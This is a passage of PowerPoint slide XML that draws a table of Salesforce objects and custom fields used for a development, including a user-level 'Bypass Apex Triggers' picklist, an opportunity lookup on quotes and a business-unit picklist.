              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2944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49" name="Line 91"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2944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0" name="Line 92"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2994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1" name="Line 93"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2994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2" name="Line 94"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2650"/>
              <a:ext cx="108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3" name="Line 95"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2088" y="2650"/>
              <a:ext cx="0" cy="3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4" name="Line 96"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2650"/>
              <a:ext cx="0" cy="3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55" name="Line 97"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2650"/>
              <a:ext cx="0" cy="3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11356" name="Group 101"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="1872" y="2592"/>
              <a:ext cx="1090" cy="58"/>
              <a:chOff x="1872" y="2352"/>
              <a:chExt cx="1090" cy="58"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11435" name="Rectangle 98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1090" cy="58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1436" name="Picture 99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3" y="2352"/>
                <a:ext cx="108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37" name="Rectangle 100"/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1090" cy="58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1357" name="Rectangle 102"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2215" y="2610"/>
              <a:ext cx="46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000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Fields used for this development</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11358" name="Rectangle 103"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2944"/>
              <a:ext cx="34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59" name="Rectangle 104"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2386" y="2958"/>
              <a:ext cx="17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BusinessUnit__c</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11360" name="Rectangle 105"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2893"/>
              <a:ext cx="34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61" name="Rectangle 106"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2386" y="2908"/>
              <a:ext cx="16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Opportunity__c</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11362" name="Rectangle 107"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2808"/>
              <a:ext cx="34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63" name="Rectangle 108"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2386" y="2823"/>
              <a:ext cx="90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OwnerId</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11364" name="Rectangle 109"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2758"/>
              <a:ext cx="34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65" name="Rectangle 110"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2386" y="2773"/>
              <a:ext cx="6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Profile</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11366" name="Rectangle 111"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2707"/>
              <a:ext cx="34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67" name="Rectangle 112"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2386" y="2722"/>
              <a:ext cx="28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Bypass_Appex_triggers__c</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11368" name="Rectangle 113"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2650"/>
              <a:ext cx="341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69" name="Rectangle 114"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2386" y="2668"/>
              <a:ext cx="16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Field name</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11370" name="Rectangle 115"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2758"/>
              <a:ext cx="252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71" name="Rectangle 116"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2727" y="2773"/>
              <a:ext cx="11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Reference </a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11372" name="Rectangle 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2842" y="2773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-</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11373" name="Rectangle 118"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2850" y="2773"/>
              <a:ext cx="84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&gt; Name</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11374" name="Rectangle 119"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2088" y="2758"/>
              <a:ext cx="28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75" name="Rectangle 120"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2106" y="2773"/>
              <a:ext cx="6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Profile</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11376" name="Rectangle 121"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2758"/>
              <a:ext cx="215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77" name="Rectangle 122"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2944"/>
              <a:ext cx="252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78" name="Rectangle 123"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2727" y="2958"/>
              <a:ext cx="74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Picklist</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11379" name="Rectangle 124"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2088" y="2944"/>
              <a:ext cx="281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0" name="Rectangle 125"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2106" y="2958"/>
              <a:ext cx="3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BU</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11381" name="Rectangle 126"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2944"/>
              <a:ext cx="215" cy="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2" name="Rectangle 127"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2650"/>
              <a:ext cx="215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3" name="Rectangle 128"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1890" y="2668"/>
              <a:ext cx="109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Objects</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11384" name="Rectangle 129"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2088" y="2650"/>
              <a:ext cx="281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5" name="Rectangle 130"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2106" y="2668"/>
              <a:ext cx="14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Field label</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11386" name="Rectangle 131"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2650"/>
              <a:ext cx="252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7" name="Rectangle 132"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2727" y="2668"/>
              <a:ext cx="72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400" i="1">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Type</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11388" name="Rectangle 133"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2707"/>
              <a:ext cx="215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89" name="Rectangle 134"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1890" y="2722"/>
              <a:ext cx="50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User</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11390" name="Rectangle 135"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2088" y="2707"/>
              <a:ext cx="28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91" name="Rectangle 136"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2106" y="2722"/>
              <a:ext cx="23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Bypass Apex Triggers</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11392" name="Rectangle 137"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2707"/>
              <a:ext cx="252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93" name="Rectangle 138"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2727" y="2722"/>
              <a:ext cx="131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Picklist multi</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11394" name="Rectangle 139"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2857" y="2722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-</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11395" name="Rectangle 140"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2864" y="2722"/>
              <a:ext cx="62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select</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11396" name="Rectangle 141"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2808"/>
              <a:ext cx="215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97" name="Rectangle 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1890" y="2823"/>
              <a:ext cx="12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</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11398" name="Rectangle 143"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2088" y="2808"/>
              <a:ext cx="281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99" name="Rectangle 144"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2106" y="2823"/>
              <a:ext cx="26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Leading UCI Opportunity </a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11400" name="Rectangle 145"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2106" y="2857"/>
              <a:ext cx="9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Manager</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11401" name="Rectangle 146"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2808"/>
              <a:ext cx="252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02" name="Rectangle 147"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2736" y="2832"/>
              <a:ext cx="20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Id</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11403" name="Rectangle 148"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2893"/>
              <a:ext cx="215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04" name="Rectangle 149"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1890" y="2908"/>
              <a:ext cx="10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Quote__c</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11405" name="Rectangle 150"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2088" y="2893"/>
              <a:ext cx="281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06" name="Rectangle 151"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2106" y="2908"/>
              <a:ext cx="123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Opportunity</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11407" name="Rectangle 152"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2893"/>
              <a:ext cx="252" cy="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08" name="Rectangle 153"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2727" y="2908"/>
              <a:ext cx="20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Lookup(Opportunity</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11409" name="Rectangle 154"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2933" y="2908"/>
              <a:ext cx="8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300" i="1">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11410" name="Line 155"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2707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1" name="Line 156"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2758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2" name="Line 157"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2893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3" name="Line 158"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2944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4" name="Line 159"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2592"/>
              <a:ext cx="0" cy="40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5" name="Line 160"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2962" y="2592"/>
              <a:ext cx="0" cy="40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6" name="Line 161"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2592"/>
              <a:ext cx="108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7" name="Line 162"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2994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8" name="Line 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2808"/>
              <a:ext cx="49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19" name="Line 164"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2707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0" name="Line 165"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2707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1" name="Line 166"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2758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2" name="Line 167"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2758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3" name="Line 168"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2808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4" name="Line 169"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2808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5" name="Line 170"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2893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6" name="Line 171"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2893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7" name="Line 172"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2944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8" name="Line 173"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2944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29" name="Line 174"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2994"/>
              <a:ext cx="341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30" name="Line 175"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2710" y="2994"/>
              <a:ext cx="25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31" name="Line 176"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1873" y="2650"/>
              <a:ext cx="108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32" name="Line 177"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2088" y="2650"/>
              <a:ext cx="0" cy="3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33" name="Line 178"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2369" y="2650"/>
              <a:ext cx="0" cy="3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34" name="Line 179"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
